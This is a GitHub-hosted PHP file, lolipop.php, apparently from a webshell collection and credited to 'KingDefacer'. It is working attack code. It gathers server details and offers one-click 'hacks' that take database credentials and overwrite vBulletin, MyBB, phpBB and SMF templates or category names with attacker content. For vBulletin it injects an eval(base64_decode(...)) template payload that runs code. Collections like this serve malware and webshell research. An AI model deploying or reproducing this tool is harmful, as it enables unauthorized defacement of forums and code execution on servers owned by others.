forked from JohnTroony/php-webshells
-
Notifications
You must be signed in to change notification settings - Fork 0
/
lolipop.php
288 lines (234 loc) · 13 KB
/
lolipop.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
<p align="right"></p><body bgcolor="#FFFFFF">
<?php
######################## Begining of Coding ;) ######################
error_reporting(0);
$info = $_SERVER['SERVER_SOFTWARE'];
$site = getenv("HTTP_HOST");
$page = $_SERVER['SCRIPT_NAME'];
$sname = $_SERVER['SERVER_NAME'];
$uname = php_uname();
$smod = ini_get('safe_mode');
$disfunc = ini_get('disable_functions');
$yourip = $_SERVER['REMOTE_ADDR'];
$serverip = $_SERVER['SERVER_ADDR'];
$version = phpversion();
$ccc = realpath($_GET['chdir'])."/";
$fdel = $_GET['fdel'];
$execute = $_POST['execute'];
$cmd = $_POST['cmd'];
$commander = $_POST['commander'];
$ls = "ls -la";
$source = $_POST['source'];
$gomkf = $_POST['gomkf'];
$title = $_POST['title'];
$sourcego = $_POST['sourcego'];
$ftemp = "tmp";
$temp = tempnam($ftemp, "cx");
$fcopy = $_POST['fcopy'];
$tuser = $_POST['tuser'];
$user = $_POST['user'];
$wdir = $_POST['wdir'];
$tdir = $_POST['tdir'];
$symgo = $_POST['symgo'];
$sym = "xhackers.txt";
$to = $_POST['to'];
$sbjct = $_POST['sbjct'];
$msg = $_POST['msg'];
$header = "From:".$_POST['header'];
//PHPinfo
if(isset($_POST['phpinfo']))
{
die(phpinfo());
}
//Guvenli mod vs vs
if ($smod)
{
$c_h = "<font color=red face='Verdana' size='1'>ON</font>";
}
else
{
$c_h = "<font face='Verdana' size='1' color=green>OFF</font>";
}
//Kapali Fonksiyonlar
if (''==($disfunc))
{
$dis = "<font color=green>None</font>";
}
else
{
$dis = "<font color=red>$disfunc</font>";
}
//Dizin degisimi
if(isset($_GET['dir']) && is_dir($_GET['dir']))
{
chdir($_GET['dir']);
}
$ccc = realpath($_GET['chdir'])."/";
//Baslik
echo "<head>
<style>
body { font-size: 12px;
font-family: arial, helvetica;
scrollbar-width: 5;
scrollbar-height: 5;
scrollbar-face-color: black;
scrollbar-shadow-color: silver;
scrollbar-highlight-color: silver;
scrollbar-3dlight-color:silver;
scrollbar-darkshadow-color: silver;
scrollbar-track-color: black;
scrollbar-arrow-color: silver;
}
</style>
<title>Lolipop.php - Edited By KingDefacer - [$site]</title></head>";
//Ana tablo
echo "<body text='#FFFFFF'>
<table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'>
<tr>
<td><font color='#000000'>
<font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font>
</tr>
<tr>
<td style='border: 1px solid #333333'>
<font face='Verdana' size='1' color='#000000'>Site: <u>$site</u><br>Server name: <u>$sname</u><br>Software: <u>$info</u><br>Version : <u>$version</u><br>Uname -a: <u>$uname</u><br>Path: <u>$ccc</u><br>Safemode: <u>$c_h</u><br>Disable Functions: <u>$dis</u><br>Page: <u>$page</u><br>Your IP: <u>$yourip</u><br>Server IP: <u><a href='http://whois.domaintools.com/".$serverip."'>$serverip</a></u></font></td>
</tr>
</table>";
echo '<td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr>
';
//Buton Listesi
echo "<center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center>";
//VB HACK
if (isset($_POST['vbulletin']))
{
echo "<center><table border=0 width='100%'>
<tr><td>
<center><font face='Arial' color='#000000'>==Lolipop VB index.==</font></center>
<center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=dbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=dbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=dbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=dbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>?ndexin Yaz?lacag? B?l?m</font><br><textarea name=index rows='19' cols='103' style='color: #000000; background-color: #FFFFFF'>buraya indexiniz gelecek.?ndexi yaz postala kay gitsin.</textarea><br>
<input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>";
die();
}
$KingDefacer="Powered By Lolipop :))";
$dbh = $_POST['dbh'];
$dbu = $_POST['dbu'];
$dbn = $_POST['dbn'];
$dbp = $_POST['dbp'];
$index = $_POST['index'];
$index=str_replace("\'","'",$index);
$set_index = "{\${eval(base64_decode(\'";
$set_index .= base64_encode("echo \"$index\";");
$set_index .= "\'))}}{\${exit()}}</textarea>";
if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index))
{
mysql_connect($dbh,$dbu,$dbp) or die(mysql_error());
mysql_select_db($dbn) or die(mysql_error());
$loli1 = "UPDATE template SET template='".$set_index."".$KingDefacer."' WHERE title='spacer_open'";
$loli2 = "UPDATE template SET template='".$set_index."".$KingDefacer."' WHERE title='FORUMHOME'";
$loli3 = "UPDATE style SET css='".$set_index."".$KingDefacer."', stylevars='', csscolors='', editorstyles=''";
$result = mysql_query($loli1) or die (mysql_error());
$result = mysql_query($loli2) or die (mysql_error());
$result = mysql_query($loli3) or die (mysql_error());
echo "<script>alert('Vb Hacked');</script>";
}
//MyBB Hack
if (isset($_POST['mybulletin']))
{
echo "<center><table border=0 width='100%'>
<tr><td>
<center><font face='Arial' color='#000000'>==Lolipop MyBB index.==</font></center>
<center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=mybbdbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=mybbdbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=mybbdbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=mybbdbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>?ndexin Yaz?lacag? B?l?m</font><br><textarea name=mybbindex rows='19' cols='103' style='color: #000000; background-color: #FFFFFF'>buraya indexiniz gelecek.?ndexi yaz postala kay gitsin.</textarea><br>
<input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>";
die();
}
$mybb_dbh = $_POST['mybbdbh'];
$mybb_dbu = $_POST['mybbdbu'];
$mybb_dbn = $_POST['mybbdbn'];
$mybb_dbp = $_POST['mybbdbp'];
$mybb_index = $_POST['mybbindex'];
if (!empty($mybb_dbh) && !empty($mybb_dbu) && !empty($mybb_dbn) && !empty($mybb_index))
{
mysql_connect($mybb_dbh,$mybb_dbu,$mybb_dbp) or die(mysql_error());
mysql_select_db($mybb_dbn) or die(mysql_error());
$prefix="mybb_";
$loli7 = "UPDATE ".$prefix."templates SET template='".$mybb_index."' WHERE title='index'";
$result = mysql_query($loli7) or die (mysql_error());
echo "<script>alert('MyBB Hacked');</script>";
}
//PhpBB
if (isset($_POST['phpbb']))
{
echo "<center><table border=0 width='100%'>
<tr><td>
<center><font face='Arial' color='#000000'>==Lolipop PHPBB index.==</font></center>
<center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=phpbbdbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=phpbbdbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=phpbbdbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=phpbbdbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>Yazi Veya KOD<br></font><input type=text name=phpbbkat size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>Degisecek KATEGORI ID si<br></font><input type=text name=katid size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>";
die();
}
$phpbb_dbh = $_POST['phpbbdbh'];
$phpbb_dbu = $_POST['phpbbdbu'];
$phpbb_dbn = $_POST['phpbbdbn'];
$phpbb_dbp = $_POST['phpbbdbp'];
$phpbb_kat = $_POST['phpbbkat'];
$kategoriid=$_POST['katid'];
if (!empty($phpbb_dbh) && !empty($phpbb_dbu) && !empty($phpbb_dbn) && !empty($phpbb_kat))
{
mysql_connect($phpbb_dbh,$phpbb_dbu,$phpbb_dbp) or die(mysql_error());
mysql_select_db($phpbb_dbn) or die(mysql_error());
$loli10 = "UPDATE phpbb_categories SET cat_title='".$phpbb_kat."' WHERE cat_id='".$kategoriid."'";
$result = mysql_query($loli10) or die (mysql_error());
echo "<script>alert('PhpBB Hacked');</script>";
}
//SmfHACK
if (isset($_POST['smf']))
{
echo "<center><table border=0 width='100%'>
<tr><td>
<center><font face='Arial' color='#000000'>==Lolipop SMF Index.==</font></center>
<center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=smfdbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=smfdbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=smfdbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=smfdbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>Yazi Yada KOD<br></font><input type=text name=smf_index size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>Degisecek KATEGORI ID si <br></font><input type=text name=katid size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>";
die();
}
$smf_dbh = $_POST['smfdbh'];
$smf_dbu = $_POST['smfdbu'];
$smf_dbn = $_POST['smfdbn'];
$smf_dbp = $_POST['smfdbp'];
$smf_index = $_POST['smf_index'];
$smf_katid=$_POST['katid'];
if (!empty($smf_dbh) && !empty($smf_dbu) && !empty($smf_dbn) && !empty($smf_index))
{
mysql_connect($smf_dbh,$smf_dbu,$smf_dbp) or die(mysql_error());
mysql_select_db($smf_dbn) or die(mysql_error());
$prefix="smf_";
$loli12 = "UPDATE ".$prefix."categories SET name='".$smf_index."' WHERE ID_CAT='".$smf_katid."'";
$result = mysql_query($loli12) or die (mysql_error());
echo "<script>alert('smf Hacked');</script>";
}
//Alt taraf
echo "
<br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'>
<tr>
<td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'>
<p><strong>Lolipop.php</strong></p>
<p><strong>Edited By KingDefacer</strong></p>
<p><strong></strong><br>
</p></td>
</tr></table>";
// Kod bitisi
?>